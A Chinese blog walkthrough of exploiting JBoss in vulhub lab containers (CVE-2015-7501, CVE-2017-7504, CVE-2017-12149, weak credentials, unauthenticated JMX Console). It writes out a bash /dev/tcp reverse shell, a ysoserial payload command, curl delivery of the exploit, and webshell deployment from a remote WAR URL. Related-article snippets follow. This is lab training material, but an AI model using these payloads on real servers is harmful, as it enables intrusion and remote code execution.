Jboss 靶场攻略

最新推荐文章于 2025-03-23 22:56:22 发布
最新推荐文章于 2025-03-23 22:56:22 发布
阅读量830 收藏 17
点赞数 33
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_82061181/article/details/142437372
版权

CVE-2015-7501

步骤一:环境搭建

cd vulhub/jboss/JMXInvokerServlet-deserialization

docker-compose up -d

docker ps

步骤二:POC,访问地址

http://192.168.10.190:8080/invoker/JMXInvokerServlet

返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

步骤三:下载 ysoserial ⼯具进⾏漏洞利⽤

GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

将反弹shell进⾏base64编码
bash -i >& /dev/tcp/192.168.10.190/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE5MC82NjY2IDA+JjE=
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE5MC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}">exp.ser

步骤四:服务器设置监听得端⼝

nc -lvvp 6666

步骤五:执⾏命令

curl 192.168.10.190:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

反弹成功

CVE-2017-7504

步骤一:

cd vulhub/jboss/CVE-2017-7504

docker-compose up -d

步骤二:访问漏洞地址

http://192.168.10.190:8080/jbossmq-httpil/HTTPServerILServlet

步骤三:获取shell

python3 jexboss.py -u http://192.168.10.190:8080

CVE-2017-12149

步骤一:环境搭建

cd vulhub/jboss/CVE-2017-12149

docker-compose up -d

步骤二:漏洞复现

步骤三:验证是否存在漏洞 , 访问

http://192.168.10.190:8080/invoker/readonly

该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化

步骤四:使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell即可:

Administration Console弱⼝令

步骤一:环境部署

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

密码文件

/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

账户密码:admin:vulhub

步骤二:登录

http://192.168.10.190:8080/admin-console/login.seam

步骤三:点击web应⽤,上传后⻔ shell.war

上传

步骤四:连接WebShell

http://192.168.10.190:8080/shell/shell.jsp

⾼版本JMX Console未授权

步骤一:环境搭建

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

步骤二:

http://192.168.10.190:8080/jmx-console/

admin vulhub

步骤二:本地搭建部署点

在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer

步骤三:进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署

步骤四:输⼊Invoke

http://114.55.130.115/shell.war

步骤五:连接Webshell

http://192.168.10.190:8080/shell/shell.jsp

低版本JMX Console未授权

步骤一:部署环境

cd vulhub-master/jboss/CVE-2017-7504

docker-compose up -d

步骤二:进行登录

admin admin

步骤三:然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)

步骤四:找到⻚⾯中的void addURL() 选项远程加载war包来部署。

http://114.55.130.115/shell.war

步骤五:webshell连接

http://192.168.10.190:8080/shell/shell.jsp

云舒zovn
关注
[ vulhub漏洞复现篇 ] Jboss_JMXInvokerServlet_Deserialization(反序列化)代码执行漏洞
qq_51577576的博客
09-15 1221
Jboss_JMXInvokerServlet_Deserialization代码执行漏洞 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
JBoss反序列化
weixin_41438728的博客
11-16 2348
这里写目录标题基础知识原理CVE-2017-12149CVE-2017-7504验证复现思路复现-CVE-2017-12149复现-CVE-2017-7504 基础知识 序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。 Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。 形成漏洞的根源在于类ObjectInputStream在反序
常见中间件漏洞(Jboss靶场
2301_81525518的博客
09-22 606
访问http://192.168.10.194:8080/jbossmq-httpil/HTTPServerILServlet。invoker/JMXInvokerServlet 说明接⼝开放,此接⼝存在反序列化漏洞。因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub。找到⻚⾯中的void addURL() 选项远程加载war包来部署。制作war包 , 这⾥⽤之前制作好的 cmd.war。返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞。搭建远程部署 , 部署远程war包地址。
iwebsec靶场 中间件漏洞通关笔记3-Jboss中间件漏洞
mooyuan的网络安全博客
04-21 1521
JBoss是一套开源的企业级Java中间件系统,用于实现基于SOA的企业应用和服务,基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
常见中间件漏洞攻略-Jboss
最新发布
m0_66808441的博客
03-23 564
【代码】常见中间件漏洞攻略-Jboss篇。
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 814
vulhub漏洞复现-jboss反序列化漏洞
Jboss未授权访问漏洞复现
qq_40860153的博客
06-14 473
3、Jboxx4.x /jmx-console/ 后台存在未授权访问,找到jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)#这个目录只能临时用,还需要把shell转移到jmx-console的默认目录来巩固权限 \jboss-4.2.3.GA\server\default\deploy\jmx-console.war。6、接下来直接访问上传的webshell,成功访问。
Jboss CVE-2017-7504 靶场工具
09-20
Jexboss.py是一个专门用来针对Jboss CVE-2017-7504漏洞进行探测和利用的Python脚本工具,它是jexboss这个靶场工具集的核心组件。通过使用jexboss.py,安全研究员可以在受控环境中重现和分析这个特定漏洞,而开发者...
jboss服务器怎样部署项目,在JBoss AS7中进行项目部署
weixin_35214204的博客
08-05 1487
【IT168技术】 AS7的项目部署方式与原有版本相比有了较大变化,本文通过实例来讲解AS7中的项目部署方式。AS7的项目部署方式与原有版本相比有了较大变化,本文通过实例来讲解AS7中的项目部署方式。部署一个简单的Web项目下载安装完成后,我们用standalone方式来启动JBoss AS7:liweinan@smart:~/projs/jboss-7.0.0.CR1/bin$ ./stand...
Jboss多个远程命令执行漏洞(CVE-2017-12149、CVE-2015-7501、CVE-2017-7504)
qq_68163788的博客
06-26 1605
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
docker 创建 jboss
zwjapple的专栏
09-23 1035
docker jboss wildfy docker 部署jboss, docker 创建jboss admin console
JBoss漏洞 - CVE-2017-7504
HAKUNAMATATATTA的博客
12-14 2855
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。
记录Jboss的一次漏洞利用复现过程
qq1325928591的博客
07-14 427
# Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。本次测试为JBOSS后台文件上传漏洞,利用的是JBOSS靶场环境* 服务器探测发现 如果在日常渗透的过程中可使用fofa,shodan,谷歌语法等进行探测发现 例如:app=“jboss” inurl:8080/jmx-console/ 均可探测出相关服务器 漏洞利用 利用弱密码进入JBoss后台进行文件上传的漏洞 链接形式;http://x.x.x.x:8080/ 主要是利用8080,9999.9990## 标题等相关端口 该页面则为
java中间件命令执行总结,jboss中间件漏洞总结
weixin_28814119的博客
03-09 796
目录前言获取服务器所采用的中间件信息JBOSS默认配置后台漏洞弱口令/未授权访问Jboss蠕虫JMX控制台安全验证绕过漏洞(CVE-2010-0738)反序列化漏洞命令执行拒绝服务其他漏洞总结前言昨天搞了Vulhub靶场里的jboss三个反序列化漏洞,今天总结一下jboss漏洞。该总结来源于Vulhub靶场、wooyun90余个漏洞和exploit-db。获取服务器所采用的中间件信息HTTP 中的...
JBoss未授权访问漏洞Getshell过程复现
道阻且长,行则将至
06-21 3990
文章目录前言漏洞复现漏洞描述靶场搭建漏洞利用防御手段Jexboss脚本 前言 在 2021 年第五届强网杯全国网络安全挑战赛的 EasyWeb 赛题中遇到了 JBoss 未授权访问漏洞 GetShell 的漏洞场景(2021强网杯全国网络安全挑战赛Writeup),当时一脸懵圈,故在此进行学习记录下。 漏洞复现 JBoss 是一个管理 EJB 的容器和服务器,支持 EJB 1.1、EJB 2.0 和 EJB3 的规范。但 JBoss 核心服务不包括支持 servlet/JSP 的 WEB 容器,一般与 To
jboss中间件漏洞总结
看不尽的尘埃——博客
02-09 6669
目录     前言   获取服务器所采用的中间件信息   JBOSS默认配置后台漏洞   弱口令/未授权访问   Jboss蠕虫   JMX控制台安全验证绕过漏洞(CVE-2010-0738)   反序列化漏洞   命令执行   拒绝服务   其他漏洞   总结   前言 昨天搞了Vulhub靶场里的jboss三个反序列化漏洞,今天总结一下jbo...
vulhub漏洞靶场搭建
Kevin's Blog
07-19 9361
文章目录一、简介二、安装2.1 环境介绍2.2 安装docker2.3 安装docker compose2.4 下载Vulhub三、启动环境3.1 启动docker3.2 互ping测试3.3 启动环境 一、简介   Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏...
云服务器安装vulhub靶场
03-22
### 安装与配置 Vulhub 靶场 #### 准备工作 在云服务器上部署和运行 Vulhub 靀场之前,需确保已安装 Docker 和 Docker Compose。Docker 是一种容器化技术,而 Docker Compose 则用于定义和运行多容器的应用程序。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值